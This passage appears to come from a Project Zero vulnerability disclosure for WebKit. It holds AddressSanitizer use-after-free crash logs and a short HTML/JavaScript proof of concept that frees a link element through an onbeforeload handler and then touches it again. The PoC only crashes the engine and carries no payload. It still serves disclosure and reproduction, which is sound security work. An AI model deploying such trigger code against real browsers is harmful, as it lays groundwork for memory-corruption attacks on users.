#8 0x11dae9bdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd)
#9 0x11dae983c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c)
#10 0x11dda8e0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d)
#11 0x11dda3f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74)
#12 0x11dda38c9 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9)
#13 0x11dda48da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da)
#14 0x1131acac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9)
#15 0x1131ac724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724)
#16 0x1131ac66b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b)
#17 0x1131ac439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439)
#18 0x1131abb1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d)
#19 0x1131abce8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8)
#20 0x1137848fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe)
#21 0x112c0cf6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b)
#22 0x11339d040 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040)
#23 0x11472c7c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3)
#24 0x10bcb4476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476)
#25 0x10bcb1b08 in WebCore::ScriptController::globalObject(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3acb08)
#26 0x10bfc8044 in WebKit::WebFrame::jsContextForWorld(WebKit::InjectedBundleScriptWorld*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6c3044)
#27 0x7fffe41e0ab1 in Safari::WebFeedFinderController::WebFeedFinderController(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x55cab1)
#28 0x7fffe3d3cb57 in Safari::BrowserBundlePageController::determineWebFeedInformation(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xb8b57)
#29 0x7fffe3d4a12d in Safari::BrowserBundlePageLoaderClient::didFinishLoadForFrame(Safari::WK::BundlePage const&, Safari::WK::BundleFrame const&, Safari::WK::Type&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xc612d)
previously allocated by thread T0 here:
#0 0x10e8d8d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
#1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
#2 0x11e470ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)
#3 0x11e465c4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)
#4 0x11e3fb437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)
#5 0x11e3fa768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)
#6 0x111fb8e08 in WebCore::Node::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x147e08)
#7 0x112b6eaad in WebCore::HTMLDivElement::create(WebCore::QualifiedName const&, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcfdaad)
#8 0x112b84403 in WebCore::divConstructor(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd13403)
#9 0x112b821a4 in WebCore::HTMLElementFactory::createKnownElement(WTF::AtomicString const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd111a4)
#10 0x112b46ac9 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5ac9)
#11 0x112b45e17 in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd4e17)
#12 0x112b46504 in WebCore::HTMLConstructionSite::insertHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5504)
#13 0x112ca67e1 in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe357e1)
#14 0x112ca3a43 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe32a43)
#15 0x112ca183e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe3083e)
#16 0x112b73bba in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02bba)
#17 0x112b73779 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02779)
#18 0x112b729a6 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd019a6)
#19 0x112b7442e in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd0342e)
#20 0x112561351 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6f0351)
#21 0x11269d03d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c03d)
#22 0x11265c386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)
#23 0x1120eb997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)
#24 0x1120e52aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)
#25 0x114a6cc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)
#26 0x10c38e2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)
#27 0x10c391689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)
#28 0x10c390ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)
#29 0x10bc31683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x89d9) in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const
Shadow bytes around the buggy address:
0x1c100000a710: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x1c100000a720: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c100000a730: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x1c100000a740: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x1c100000a750: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
=>0x1c100000a760: fa fa fa fa fd fd[fd]fd fd fd fd fd fd fd fd fd
0x1c100000a770: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x1c100000a780: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x1c100000a790: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x1c100000a7a0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x1c100000a7b0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==29717==ABORTING
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1242
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.
PoC:
=================================================================
-->
<script>
function freememory() {
var a;
for(var i=0;i<100;i++) {
a = new Uint8Array(1024*1024);
}
}
function boom() {
var link = document.getElementById("link");
prompt(link.innerHTML);
}
function go() {
var link2 = document.createElement("link");
link2.innerHTML = div3.outerHTML;
div2.appendChild(link2);
link2.setAttribute("onbeforeload", "eventhandler()");
div1.appendChild(div2);
freememory()
setTimeout(boom,1000);
}
function eventhandler() {
document.getElementById("link").remove();
}
</script>
<body onload=go()>
<div id="div1"></div>
<div id="div2"></div>
<div id="div3">
<link id="link">
<!--
=================================================================
ASan log:
=================================================================
==29632==ERROR: AddressSanitizer: heap-use-after-free on address 0x611000087cc8 at pc 0x000112b711cd bp 0x7fff58466d00 sp 0x7fff58466cf8
READ of size 8 at 0x611000087cc8 thread T0
==29632==WARNING: invalid path to external symbolizer!
==29632==WARNING: Failed to use and restart external symbolizer!
#0 0x112b711cc in JSC::Weak<WebCore::JSDOMObject>::get() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3a51cc)
#1 0x113d3150a in JSC::JSObject* WebCore::getCachedWrapper<WebCore::Element>(WebCore::DOMWrapperWorld&, WebCore::Element&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x156550a)
#2 0x113d31364 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Element&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1565364)
#3 0x113b053d4 in WebCore::jsDocumentPrototypeFunctionGetElementByIdCaller(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13393d4)
#4 0x113aeb158 in long long WebCore::BindingCaller<WebCore::JSDocument>::callOperation<&(WebCore::jsDocumentPrototypeFunctionGetElementByIdCaller(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x131f158)
#5 0x4b4d2f201027 (<unknown module>)
#6 0x10eef934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
#7 0x10eef291a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)
#8 0x10eb57757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)
#9 0x10ead93da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)
#10 0x10e1110f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)
#11 0x10e111362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)
#12 0x10e1116d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)
#13 0x1139bfa15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)
#14 0x11507c75a in WebCore::ScheduledAction::executeFunctionInContext(JSC::JSGlobalObject*, JSC::JSValue, WebCore::ScriptExecutionContext&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28b075a)
#15 0x11507c21c in WebCore::ScheduledAction::execute(WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28b021c)
#16 0x1130238db in WebCore::DOMTimer::fired() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8578db)
#17 0x1155f3b82 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e27b82)
#18 0x1147f5b54 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2029b54)
#19 0x7fffd2f5ed03 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90d03)
#20 0x7fffd2f5e98e in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x9098e)
#21 0x7fffd2f5e4e9 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x904e9)
#22 0x7fffd2f55c30 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87c30)
#23 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)
#24 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
#25 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
#26 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
#27 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)
#28 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)
#29 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)
#30 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)
#31 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
#32 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)
#33 0x10779656c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)
#34 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)
0x611000087cc8 is located 8 bytes inside of 240-byte region [0x611000087cc0,0x611000087db0)
freed by thread T0 here:
#0 0x10a781294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)
#1 0x10f5ccf30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)
#2 0x10ec53118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118)
#3 0x10ec5192f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f)
#4 0x10ec503d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2)
#5 0x10ec4fbdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd)
#6 0x10ec4f83c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c)
#7 0x10ef0ee0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d)
#8 0x10ef09f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74)
#9 0x10ef098c9 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9)
#10 0x10ef0a8da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da)
#11 0x113b07ac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9)
#12 0x113b07724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724)
#13 0x113b0766b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b)
#14 0x113b07439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439)
#15 0x113b06b1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d)
#16 0x113b06ce8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8)
#17 0x1140df8fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe)
#18 0x113567f6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b)
